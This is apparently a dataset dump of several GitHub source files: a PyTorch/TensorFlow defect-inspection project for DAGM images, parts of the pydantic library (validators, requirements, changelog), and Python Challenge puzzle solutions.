isGPU:\n array_torch = Variable(array_torch).cuda()\n else :\n array_torch = Variable(array_torch).cpu()\n return array_torch\n\n\ndef detectDefectViaVisdom( args, result_type=1, isResultSave=True):\n \n resultFolderPath = \"./results/\"\n if not os.path.exists(resultFolderPath):\n os.mkdir(resultFolderPath) \n modelPath = \"models/\"+ args.load_folder_file[0] + args.load_folder_file[1] + '_all.pkl'\n convParamsPath = \"models/\"+ args.load_folder_file[0] + args.load_folder_file[1] + 'convParams.pkl'\n deconvParamsPath = \"models/\"+ args.load_folder_file[0] + args.load_folder_file[1] + 'deconvParams.pkl'\n \n \n convNet = \"\"\n deconvNet = \"\" \n \n try:\n print(\"Model path :\", modelPath)\n convNet, deconvNet = torch.load(modelPath, map_location=lambda storage, location: storage)\n print(\"\\n--------\" + modelPath + \" is restored--------\\n\")\n \n# print(\"Conv parameters path :\", convParamsPath)\n# print(\"Deconv parameters path :\", deconvParamsPath)\n# convNet.load_state_dict(torch.load(convParamsPath)) # it loads only the model parameters (recommended) \n# deconvNet.load_state_dict(torch.load(deconvParamsPath)) # it loads only the model parameters (recommended)\n# print(\"\\n--------\" + convParamsPath + \" is restored--------\\n\")\n# print(\"\\n--------\" + deconvParamsPath + \" is restored--------\\n\") \n \n if args.isGPU:\n convNet.cuda()\n deconvNet.cuda() \n else :\n convNet.cpu()\n deconvNet.cpu() \n \n except:\n print(\"\\n--------There are no models.--------\\n\")\n pass\n \n \n convNet.eval()\n deconvNet.eval()\n \n# images = getImagesNumberOrder(args.folderPathForEval)\n images = JK_image.getImages(args.folderPathForEval)\n nImages = len(images)\n height = images[0].shape[0]\n width = images[0].shape[1] \n \n X = np.array(images, dtype=np.float32)/255. \n X = X.reshape([-1,1,height,width]) \n \n# XX = np.hstack([X[0], X[1]]).reshape([-1,1,512,2*512])\n# X = XX\n \n X_tensor = torch.from_numpy(X) \n if args.isGPU:\n X = Variable(X_tensor).cuda()\n else :\n X = Variable(X_tensor).cpu()\n\n# X = numpyToTorchVariable(X, args.isGPU)\n\n output = convNet(X)\n output = deconvNet(output) \n\n if args.isGPU:\n output = output.cpu()\n \n Y_tensor = output.data \n \n vis = visdom.Visdom() \n \n if result_type==0:\n for i in range(nImages):\n vis.image(Y_tensor[i])\n \n elif result_type==1:\n \n results_tensor = torch.cat((X_tensor, Y_tensor), 0) \n vis.images(X_tensor, nrow=6) \n vis.images(Y_tensor, nrow=6) \n vis.images(results_tensor, nrow=6) \n \n # kk = out_images.numpy().reshape(-1,512,512)\n # heat = np.hstack([kk[0], kk[1]]).reshape([512,2*512]) \n # vis.heatmap(heat)\n\n elif result_type==2:\n inputImages_np = X_tensor.numpy().reshape([-1, height, width]) \n outputImages_np = Y_tensor.numpy().reshape([-1, height, width]) \n for i in range(nImages): \n inputImg = inputImages_np[i] \n# tempInput = JK_image.GRAY2CRGB(inputImg)\n tempInput = cv2.cvtColor(inputImg, cv2.COLOR_GRAY2BGR)\n tempInput = JK_image.HWC3toC3HW(tempInput)\n \n outputImg = outputImages_np[i]\n tempOutput = cv2.cvtColor(outputImg, cv2.COLOR_GRAY2BGR)\n tempOutput = JK_image.HWC3toC3HW(tempOutput)\n tempHeatmap = JK_image.GRAY2HeatMap(outputImg)\n \n tempInput = np.array(tempInput).reshape(-1, 3, height, width)\n tempOutput = np.array(tempOutput).reshape(-1, 3, height, width)\n tempHeatmap = np.array(tempHeatmap).reshape(-1, 3, height, width)\n \n result = np.concatenate((tempInput, tempOutput), axis=0)\n result = np.concatenate((result, tempHeatmap), axis=0)\n vis.images(result, nrow=6)\n \n \n elif result_type==3:\n inputImages_np = X_tensor.numpy().reshape([-1, height, width]) \n outputImages_np = Y_tensor.numpy().reshape([-1, height, width]) \n# inputImages = []\n# outputImages = []\n# heatmapImages = []\n resultImages = []\n for i in range(nImages): \n \n inputImg = JK_image.HWC3toC3HW( cv2.cvtColor(inputImages_np[i], cv2.COLOR_GRAY2RGB) )\n outputGray = JK_image.HWC3toC3HW( cv2.cvtColor(outputImages_np[i] , cv2.COLOR_GRAY2RGB) )\n outputHeat = JK_image.GRAY2HeatMap(outputImages_np[i] )\n \n resultImg = np.concatenate((inputImg, outputGray), axis=0)\n resultImg = np.concatenate((resultImg, outputHeat), axis=0) \n resultImages.append(resultImg)\n \n# inputImages.append( util_image.HWC3toC3HW( cv2.cvtColor(inputImg, cv2.COLOR_GRAY2RGB) ) )\n# outputImages.append( util_image.HWC3toC3HW( cv2.cvtColor(outputImg, cv2.COLOR_GRAY2RGB) ) )\n# heatmapImages.append( util_image.GRAY2HeatMap(outputImg) )\n \n# inputImages = np.array(inputImages).reshape(-1, 3, height, width)\n# outputImages = np.array(outputImages).reshape(-1, 3, height, width)\n# heatmapImages = np.array(heatmapImages).reshape(-1, 3, height, width) \n# results = np.concatenate((inputImages, outputImages), axis=0)\n# results = np.concatenate((results, heatmapImages), axis=0)\n# vis.images(results, nrow=6)\n\n resultImages = np.array(resultImages).reshape(-1, 3, height, width) \n vis.images(resultImages, nrow=3)\n \n print(\"Input size :\", X_tensor.size())\n print(\"Output size :\", Y_tensor.size())\n print(\"========================================================\")\n \n \n \nclass dotdict(dict):\n def __getattr__(self, name):\n return self[name]\n\n \n\nif __name__ == '__main__': \n \n print(\"Torch version :\", torch.__version__)\n \n # GPU check\n useGPU = torch.cuda.is_available()\n \n if useGPU :\n deviceNo = torch.cuda.current_device()\n print(\"GPU_is_available.\")\n print(\"DeviceNo :\", deviceNo)\n print(torch.cuda.device(deviceNo))\n print(\"Device_count :\", torch.cuda.device_count())\n# print(torch.cuda.get_device_name(0))\n# print(\"Device_capability :\", torch.cuda.get_device_capability(deviceNo))\n# print(\"Device_max_memory :\", torch.cuda.max_memory_allocated(deviceNo))\n# print(\"Device_max_memory_cached :\", torch.cuda.max_memory_cached(deviceNo))\n \n else :\n print(\"There are no GPU.\")\n \n \n args = dotdict({\n 'isGPU' : False, #False, # True,\n 'load_folder_file': (\"DAGM_jkfcn3/\",'jkfcn3'), #(\"ForClass4_jkfcn3/\",'ForClass4_jkfcn3'), # \n 'folderPathForEval': \"../DataForEvaluation\",\n })\n \n if useGPU==False and args.isGPU==True:\n args.isGPU = False\n print(\"GPU is not availabe.\")\n \n if args.isGPU==False:\n print(\"Runing by CPU\")\n \n if useGPU==False and args.isGPU==True:\n args.isGPU = False\n print(\"GPU is not availabe.\")\n if args.isGPU==False:\n print(\"Runing by CPU\")\n \n detectDefectViaVisdom(args, result_type=0) \n \n \n "
},
{
"alpha_fraction": 0.4507253170013428,
"alphanum_fraction": 0.4873359501361847,
"avg_line_length": 55.52317810058594,
"blob_id": "92ac5dcf1bf67bcffb7b5becbec79e7de197b415",
"content_id": "4001f5f4b09916dac5f9f810e88c3a620060f378",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8686,
"license_type": "permissive",
"max_line_length": 151,
"num_lines": 151,
"path": "/DAGM/DAGM_CNN_final/networks/jknet1.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 24 10:56:53 2017\r\n\r\n@author: Jaekyung\r\n\"\"\"\r\nimport sys, os\r\nsys.path.append(os.pardir) # parent directory\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\n\r\ntf.set_random_seed(777) # reproducibility\r\n\r\n\r\nclass Model:\r\n \r\n def __init__(self, sess, name, learning_rate=0.0001, feature_shape=[32,32,1], lable_size=12, weight_decay_rate=1e-5):\r\n self.sess = sess\r\n self._name = name\r\n self._learning_rate = learning_rate\r\n self._feature_shape = feature_shape\r\n self._lable_size = lable_size\r\n \r\n self.kernel_regularizer = tf.contrib.layers.l2_regularizer(scale=weight_decay_rate)\r\n \r\n self._build_net()\r\n \r\n \r\n \r\n def _build_net(self): \r\n with tf.variable_scope(self._name):\r\n # dropout (keep_prob) rate 0.7~0.5 on training, but should be 1\r\n # for testing \r\n self.training = tf.placeholder(tf.bool, name=\"training\")\r\n\r\n # input place holders\r\n self.X = tf.placeholder( tf.float32, [None, self._feature_shape[0]*self._feature_shape[1]*self._feature_shape[2]], name=\"input\") \r\n X_img = tf.reshape(self.X, [-1, self._feature_shape[0], self._feature_shape[1], self._feature_shape[2]])\r\n self.Y = tf.placeholder(tf.float32, [None, self._lable_size])\r\n \r\n # Convolutional Layer #1 and # Pooling Layer #1\r\n conv11 = tf.layers.conv2d(inputs=X_img, filters=64, kernel_size=[3,3], \r\n padding=\"SAME\", activation=tf.nn.relu, \r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,60,60,64)\r\n\r\n conv12 = tf.layers.conv2d(inputs=conv11, filters=64, kernel_size=[3,3], \r\n padding=\"SAME\", activation=tf.nn.relu,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,60,60,64)\r\n \r\n pool1 = tf.layers.max_pooling2d(inputs=conv12, pool_size=[2,2],\r\n padding=\"SAME\", strides=2) # (?,14,14,64) # (?,16,16,64)32\r\n \r\n dropout1 = tf.layers.dropout(inputs=pool1, \r\n rate=0.7, training=self.training)\r\n \r\n # Convolutional Layer #2 and Pooling Layer #2\r\n conv21 = tf.layers.conv2d(inputs=dropout1, filters=128, kernel_size=[3,3],\r\n padding=\"SAME\", activation=tf.nn.relu, \r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,30,30,64)\r\n \r\n conv22 = tf.layers.conv2d(inputs=conv21, filters=128, kernel_size=[3,3],\r\n padding=\"SAME\", activation=tf.nn.relu,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,30,30,64)\r\n \r\n conv23 = tf.layers.conv2d(inputs=conv22, filters=128, kernel_size=[3,3],\r\n padding=\"SAME\", activation=tf.nn.relu,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,64)\r\n \r\n pool2 = tf.layers.max_pooling2d(inputs=conv23, pool_size=[2,2],\r\n padding=\"SAME\", strides=2) # (?,7,7,64) # (?,8,8,64)16\r\n \r\n dropout2 = tf.layers.dropout(inputs=pool2,\r\n rate=0.7, training=self.training)\r\n \r\n # Convolutional Layer #2 and Pooling Layer #3\r\n conv31 = tf.layers.conv2d(inputs=dropout2, filters=256, kernel_size=[3,3],\r\n padding=\"SAME\", activation=tf.nn.relu,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256)\r\n \r\n conv32 = tf.layers.conv2d(inputs=conv31, filters=256, kernel_size=[3,3],\r\n padding=\"SAME\", activation=tf.nn.relu,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256)\r\n \r\n conv33 = tf.layers.conv2d(inputs=conv32, filters=256, kernel_size=[3,3],\r\n padding=\"SAME\", activation=tf.nn.relu, \r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256)\r\n \r\n conv34 = tf.layers.conv2d(inputs=conv33, filters=256, kernel_size=[3,3],\r\n padding=\"SAME\", activation=tf.nn.relu, \r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256)\r\n \r\n pool3 = tf.layers.max_pooling2d(inputs=conv34, pool_size=[2,2],\r\n padding=\"SAME\", strides=2) # (?,4,4,256) # (?,4,4,256)8\r\n \r\n dropout3 = tf.layers.dropout(inputs=pool3,\r\n rate=0.7, training=self.training)\r\n \r\n # Dense Layer with Relu ========================================================================\r\n flat = tf.reshape(dropout3, [-1, 256*4*4]) # 32-(?,4*4*128) # 60-(?,8*8*128) \r\n \r\n dense4 = tf.layers.dense(inputs=flat, units=1024, activation=tf.nn.relu, \r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,1024)\r\n \r\n dropout4 = tf.layers.dropout(inputs=dense4, rate=0.5, training=self.training)\r\n \r\n dense5 = tf.layers.dense(inputs=dropout4, units=1024, activation=tf.nn.relu, \r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,1024)\r\n \r\n dropout5 = tf.layers.dropout(inputs=dense5, rate=0.5, training=self.training)\r\n \r\n self.logits = tf.layers.dense(inputs=dropout5, units=self._lable_size, \r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer ) # (?,2)\r\n \r\n \r\n self.prob = tf.nn.softmax(self.logits, name=\"prob\")\r\n self.result = tf.argmax(self.logits, 1, name=\"result\")\r\n \r\n # define cost/loss & optimizer\r\n self.cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\r\n logits=self.logits, labels=self.Y))\r\n self.optimizer = tf.train.AdamOptimizer(learning_rate=self._learning_rate).minimize(self.cost)\r\n\r\n correct_prediction = tf.equal(tf.argmax(self.logits, 1), tf.argmax(self.Y, 1))\r\n \r\n self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n\r\n def predict(self, x_test, training=False):\r\n return self.sess.run(self.prob,\r\n feed_dict={self.X: x_test, self.training: training})\r\n\r\n def get_accuracy(self, x_test, y_test, training=False):\r\n return self.sess.run(self.accuracy,\r\n feed_dict={self.X: x_test,\r\n self.Y: y_test, self.training: training})\r\n\r\n def train(self, x_data, y_data, training=True):\r\n return self.sess.run([self.cost, self.optimizer], feed_dict={\r\n self.X: x_data, self.Y: y_data, self.training: training})\r\n"
}
] | 16 |
drpoggi/pydantic
|
https://github.com/drpoggi/pydantic
|
72df1211ebf9968cb7f38a3d97ef78cf0942bbf6
|
27887c6e997671ff0ea9d8f815e7628a40eb1134
|
48bffbc25b2c8ba60395b7d5eafdd7911b736857
|
refs/heads/master
| 2021-01-25T14:34:11.654404 | 2018-03-02T13:29:19 | 2018-03-02T13:29:19 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4861878454685211,
"alphanum_fraction": 0.6795580387115479,
"avg_line_length": 15.454545021057129,
"blob_id": "c860d184dbbb992f44f301e014a6928a8f21b383",
"content_id": "50154ec5ea2ce5f4fa90dafbf56c963e9ee01eb1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 181,
"license_type": "permissive",
"max_line_length": 19,
"num_lines": 11,
"path": "/tests/requirements.txt",
"repo_name": "drpoggi/pydantic",
"src_encoding": "UTF-8",
"text": "coverage==4.5.1\nflake8==3.5.0\nisort==4.3.4\nmypy==0.560\npycodestyle==2.3.1\npyflakes==1.6.0\npytest==3.4.1\npytest-cov==2.5.1\npytest-isort==0.1.0\npytest-mock==1.7.1\npytest-sugar==0.9.1\n"
},
{
"alpha_fraction": 0.5692567825317383,
"alphanum_fraction": 0.6402027010917664,
"avg_line_length": 32.6363639831543,
"blob_id": "8736d867aeb8e21475d2d3f44af25853f9398591",
"content_id": "3ba9a8ca6bb41c861915db2121e46b10b2104084",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 2960,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 88,
"path": "/HISTORY.rst",
"repo_name": "drpoggi/pydantic",
"src_encoding": "UTF-8",
"text": ".. :changelog:\n\nHistory\n-------\n\nv0.7.1 (2018-02-07)\n...................\n* fix bug with ``create_model`` modifying the base class\n\nv0.7.0 (2018-02-06)\n...................\n* added compatibility with abstract base classes (ABCs) #123\n* add ``create_model`` method #113 #125\n* **breaking change**: rename ``.config`` to ``.__config__`` on a model\n* **breaking change**: remove deprecated ``.values()`` on a model, use ``.dict()`` instead\n* remove use of ``OrderedDict`` and use simple dict #126\n* add ``Config.use_enum_values`` #127\n* add wildcard validators of the form ``@validate('*')`` #128\n\nv0.6.4 (2018-02-01)\n...................\n* allow python date and times objects #122\n\nv0.6.3 (2017-11-26)\n...................\n* fix direct install without ``README.rst`` present\n\nv0.6.2 (2017-11-13)\n...................\n* errors for invalid validator use\n* safer check for complex models in ``Settings``\n\nv0.6.1 (2017-11-08)\n...................\n* prevent duplicate validators, #101\n* add ``always`` kwarg to validators, #102\n\nv0.6.0 (2017-11-07)\n...................\n* assignment validation #94, thanks petroswork!\n* JSON in environment variables for complex types, #96\n* add ``validator`` decorators for complex validation, #97\n* depreciate ``values(...)`` and replace with ``.dict(...)``, #99\n\nv0.5.0 (2017-10-23)\n...................\n* add ``UUID`` validation #89\n* remove ``index`` and ``track`` from error object (json) if they're null #90\n* improve the error text when a list is provided rather than a dict #90\n* add benchmarks table to docs #91\n\nv0.4.0 (2017-07-08)\n...................\n* show length in string validation error\n* fix aliases in config during inheritance #55\n* simplify error display\n* use unicode ellipsis in ``truncate``\n* add ``parse_obj``, ``parse_raw`` and ``parse_file`` helper functions #58\n* switch annotation only fields to come first in fields list not last\n\nv0.3.0 (2017-06-21)\n...................\n* immutable models via ``config.allow_mutation = False``, associated cleanup and performance improvement #44\n* immutable helper methods ``construct()`` and ``copy()`` #53\n* allow pickling of models #53\n* ``setattr`` is removed as ``__setattr__`` is now intelligent #44\n* ``raise_exception`` removed, Models now always raise exceptions #44\n* instance method validators removed\n* django-restful-framework benchmarks added #47\n* fix inheritance bug #49\n* make str type stricter so list, dict etc are not coerced to strings. #52\n* add ``StrictStr`` which only always strings as input #52\n\nv0.2.1 (2017-06-07)\n...................\n* pypi and travis together messed up the deploy of ``v0.2`` this should fix it\n\nv0.2.0 (2017-06-07)\n...................\n* **breaking change**: ``values()`` on a model is now a method not a property,\n takes ``include`` and ``exclude`` arguments\n* allow annotation only fields to support mypy\n* add pretty ``to_string(pretty=True)`` method for models\n\nv0.1.0 (2017-06-03)\n...................\n* add docs\n* add history\n"
},
{
"alpha_fraction": 0.5844155550003052,
"alphanum_fraction": 0.7402597665786743,
"avg_line_length": 18.25,
"blob_id": "67b90d69f142a8d426f8a0e89a8dc93908845d1b",
"content_id": "8b0dc6a4991e449cfa55686036fdba6018e46b57",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 77,
"license_type": "permissive",
"max_line_length": 31,
"num_lines": 4,
"path": "/docs/requirements.txt",
"repo_name": "drpoggi/pydantic",
"src_encoding": "UTF-8",
"text": "docutils==0.14\nPygments==2.2.0\nSphinx==1.7.1\nsphinxcontrib-websupport==1.0.1\n"
},
{
"alpha_fraction": 0.6120067834854126,
"alphanum_fraction": 0.6134917140007019,
"avg_line_length": 23.94179916381836,
"blob_id": "af9d3a1786cc5861599b1c00dab5aea6e8b46cb2",
"content_id": "8918b7d65c5c4b67af87c7f6bae08683c3d995e2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4714,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 189,
"path": "/pydantic/types.py",
"repo_name": "drpoggi/pydantic",
"src_encoding": "UTF-8",
"text": "import re\nfrom typing import Optional, Type, Union\n\nfrom .utils import import_string, make_dsn, validate_email\nfrom .validators import str_validator\n\n__all__ = [\n 'NoneStr',\n 'NoneBytes',\n 'StrBytes',\n 'NoneStrBytes',\n 'StrictStr',\n 'ConstrainedStr',\n 'constr',\n 'EmailStr',\n 'NameEmail',\n 'PyObject',\n 'DSN',\n 'ConstrainedInt',\n 'conint',\n 'PositiveInt',\n 'NegativeInt',\n]\n\nNoneStr = Optional[str]\nNoneBytes = Optional[bytes]\nStrBytes = Union[str, bytes]\nNoneStrBytes = Optional[StrBytes]\n\n\nclass StrictStr(str):\n @classmethod\n def get_validators(cls):\n yield cls.validate\n\n @classmethod\n def validate(cls, v):\n if not isinstance(v, str):\n raise ValueError(f'strict string: str expected not {type(v)}')\n return v\n\n\nclass ConstrainedStr(str):\n min_length: int = None\n max_length: int = None\n curtail_length: int = None\n regex = None\n\n @classmethod\n def get_validators(cls):\n yield str_validator\n yield cls.validate\n\n @classmethod\n def validate(cls, value: str) -> str:\n if value is None:\n raise TypeError('None is not an allow value')\n\n v_len = len(value)\n if cls.min_length is not None and v_len < cls.min_length:\n raise ValueError(f'length less than minimum allowed: {cls.min_length}')\n\n if cls.curtail_length:\n if v_len > cls.curtail_length:\n value = value[:cls.curtail_length]\n elif cls.max_length is not None and v_len > cls.max_length:\n raise ValueError(f'length greater than maximum allowed: {cls.max_length}')\n\n if cls.regex:\n if not cls.regex.match(value):\n raise ValueError(f'string does not match regex \"{cls.regex.pattern}\"')\n return value\n\n\nclass EmailStr(str):\n @classmethod\n def get_validators(cls):\n yield str_validator\n yield cls.validate\n\n @classmethod\n def validate(cls, value):\n return validate_email(value)[1]\n\n\nclass NameEmail:\n __slots__ = 'name', 'email'\n\n def __init__(self, name, email):\n self.name = name\n self.email = email\n\n @classmethod\n def get_validators(cls):\n yield str_validator\n yield cls.validate\n\n @classmethod\n def validate(cls, value):\n return cls(*validate_email(value))\n\n def __str__(self):\n return f'{self.name} <{self.email}>'\n\n def __repr__(self):\n return f'<NameEmail(\"{self}\")>'\n\n\ndef constr(*, min_length=0, max_length=2**16, curtail_length=None, regex=None) -> Type[str]:\n # use kwargs then define conf in a dict to aid with IDE type hinting\n namespace = dict(\n min_length=min_length,\n max_length=max_length,\n curtail_length=curtail_length,\n regex=regex and re.compile(regex)\n )\n return type('ConstrainedStrValue', (ConstrainedStr,), namespace)\n\n\nclass PyObject:\n validate_always = True\n\n @classmethod\n def get_validators(cls):\n yield str_validator\n yield cls.validate\n\n @classmethod\n def validate(cls, value):\n try:\n return import_string(value)\n except ImportError as e:\n # errors must be TypeError or ValueError\n raise ValueError(str(e)) from e\n\n\nclass DSN(str):\n prefix = 'db_'\n fields = 'driver', 'user', 'password', 'host', 'port', 'name', 'query'\n validate_always = True\n\n @classmethod\n def get_validators(cls):\n yield str_validator\n yield cls.validate\n\n @classmethod\n def validate(cls, value, values, **kwarg):\n if value:\n return value\n kwargs = {f: values.get(cls.prefix + f) for f in cls.fields}\n if kwargs['driver'] is None:\n raise ValueError(f'\"{cls.prefix}driver\" field may not be missing or None')\n return make_dsn(**kwargs)\n\n\nclass ConstrainedInt(int):\n gt: int = None\n lt: int = None\n\n @classmethod\n def get_validators(cls):\n yield int\n yield cls.validate\n\n @classmethod\n def validate(cls, value: int) -> int:\n if cls.gt is not None and value <= cls.gt:\n raise ValueError(f'size less than minimum allowed: {cls.gt}')\n elif cls.lt is not None and value >= cls.lt:\n raise ValueError(f'size greater than maximum allowed: {cls.lt}')\n return value\n\n\ndef conint(*, gt=None, lt=None) -> Type[int]:\n # use kwargs then define conf in a dict to aid with IDE type hinting\n namespace = dict(gt=gt, lt=lt)\n return type('ConstrainedIntValue', (ConstrainedInt,), namespace)\n\n\nclass PositiveInt(ConstrainedInt):\n gt = 0\n\n\nclass NegativeInt(ConstrainedInt):\n lt = 0\n\n\n# TODO, JsonEither, JsonList, JsonDict\n"
},
{
"alpha_fraction": 0.7264957427978516,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 18.5,
"blob_id": "c156785595169cf45d2911ab33a88ebf9d86a5db",
"content_id": "90e89d0383f85ced937188b3b4e1473d280d80a2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 117,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 6,
"path": "/requirements.txt",
"repo_name": "drpoggi/pydantic",
"src_encoding": "UTF-8",
"text": "-r benchmarks/requirements.txt\n-r docs/requirements.txt\n-r tests/requirements.txt\n\nmsgpack-python==0.5.5\nujson==1.35\n"
}
] | 5 |
gsidhu/Python_Challenge_Solutions
|
https://github.com/gsidhu/Python_Challenge_Solutions
|
61e1a40c1f6bdc4e8b8f63139bd11905d091b74d
|
55d3b9e030c92a45a3fc5af84e6965656db915a2
|
eae0f1181df4dbe7cd80e8b728077ece54e0c3f2
|
refs/heads/master
| 2021-01-19T03:51:46.848197 | 2014-06-22T21:37:46 | 2014-06-22T21:37:46 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5376344323158264,
"alphanum_fraction": 0.6344085931777954,
"avg_line_length": 17.600000381469727,
"blob_id": "e464b662e99396578f2b8a7cd410b60779eb7269",
"content_id": "a552724f0b10507524abdca74bf21ef2bbe6e6c2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 93,
"license_type": "permissive",
"max_line_length": 29,
"num_lines": 5,
"path": "/pex0.py",
"repo_name": "gsidhu/Python_Challenge_Solutions",
"src_encoding": "UTF-8",
"text": "## Python Challenge Solutions\n## MIT License, 2014 Gurjot S. Sidhu\n\ndef pex0():\n return (2**19)**2\n"
},
{
"alpha_fraction": 0.5448275804519653,
"alphanum_fraction": 0.568965494632721,
"avg_line_length": 19.714284896850586,
"blob_id": "02bde503f1caecb526611a20230ed0c6fccf4a5d",
"content_id": "0d81236f758eebc45aae9a1045426c49e6207f14",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 580,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 28,
"path": "/pex4.py",
"repo_name": "gsidhu/Python_Challenge_Solutions",
"src_encoding": "UTF-8",
"text": "## Python Challenge Solutions\n## MIT License, 2014 Gurjot S. Sidhu\n\n\ndef pex4(x):\n '''\n for i in link:\n\tsth = pex4(link[-1])\n\tlink.append(sth)\n\tprint(link)\n\n Answer: peak.html \n '''\n import urllib.request as url\n import re\n link = []\n f = url.urlopen('http://www.pythonchallenge.com/pc/def/linkedlist.php?nothing=' + x)\n text = f.read()\n f.close()\n pattern = re.compile(b'[0-9]+')\n pattern2 = re.compile('[0-9]+')\n num = re.findall(pattern, text)\n a = ''\n for i in num:\n a = str(i)\n link = re.findall(pattern2, a)\n\n return link[0]\n"
},
{
"alpha_fraction": 0.7390109896659851,
"alphanum_fraction": 0.7390109896659851,
"avg_line_length": 59.5,
"blob_id": "49488170e80f86b13c0e0fc9c6982c34e1a5006d",
"content_id": "7a0e4f45dbf034122b55253b02520d4946be06b1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 364,
"license_type": "permissive",
"max_line_length": 189,
"num_lines": 6,
"path": "/README.md",
"repo_name": "gsidhu/Python_Challenge_Solutions",
"src_encoding": "UTF-8",
"text": "##The Python Challenge - Solutions\n===================\n\n[The Python Challenge](www.pythonchallenge.com) has a brilliant set of mind-bending exercises. Here I'll post the solutions to some of the exercises that I have been able to crack through. \n\nI would **strongly** suggest you try to solve the exercises on your own and not rely on easily-available solutions. \n"
},
{
"alpha_fraction": 0.5340599417686462,
"alphanum_fraction": 0.5517711043357849,
"avg_line_length": 23.433332443237305,
"blob_id": "e16845f6612c21fb8228aa1d443575939f600397",
"content_id": "0970191754532c31cfcf2650cafc1f903214fc11",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 734,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 30,
"path": "/pex6.py",
"repo_name": "gsidhu/Python_Challenge_Solutions",
"src_encoding": "UTF-8",
"text": "## Python Challenge Solutions\n## MIT License, 2014 Gurjot S. Sidhu\n\ndef pex6():\n '''\n Change URL to channel.zip and readme.txt\n Apparently textfiles inside zipfiles have comments you can extract\n\n answer: hockey -> oxygen\n '''\n\n import string\n import zipfile\n bob = []\n f = zipfile.ZipFile('channel.zip')\n filename = \"90052.txt\"\n while True:\n file = open(filename)\n txt = file.read()\n filename = txt[16:] + '.txt'\n if filename[0] not in string.digits:\n break\n bob.append(f.getinfo(filename).comment)\n chop = []\n for i in bob:\n chop.append(str(i).strip(\"b'\"))\n for j in chop:\n if j == '\\\\n':\n print('')\n print(j, end = '')\n\n"
},
{
"alpha_fraction": 0.5384615659713745,
"alphanum_fraction": 0.559440553188324,
"avg_line_length": 22.83333396911621,
"blob_id": "5289b3ba0ada56f1df620e7ab0c6efd8a527d602",
"content_id": "27b27634b5aeef3e578b3f1a88679294abc80d6e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 286,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 12,
"path": "/pex3.py",
"repo_name": "gsidhu/Python_Challenge_Solutions",
"src_encoding": "UTF-8",
"text": "## Python Challenge Solutions\n## MIT License, 2014 Gurjot S. Sidhu\n\ndef pex3():\n '''\n Answer: linkedlist\n '''\n import re\n file = open('pex3.txt')\n text = file.read()\n pattern = re.compile('[a-z][A-Z][A-Z][A-Z][a-z][A-Z][A-Z][A-Z][a-z]')\n return re.findall(pattern, text)\n"
},
{
"alpha_fraction": 0.5365344285964966,
"alphanum_fraction": 0.5490605235099792,
"avg_line_length": 21.809524536132812,
"blob_id": "30b7dcc684d3b9b06041e2c12f8dd38b20c8f11c",
"content_id": "c3b4275a90065ddf88a077b82f3ff6a8d2e51626",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 479,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 21,
"path": "/pex1.py",
"repo_name": "gsidhu/Python_Challenge_Solutions",
"src_encoding": "UTF-8",
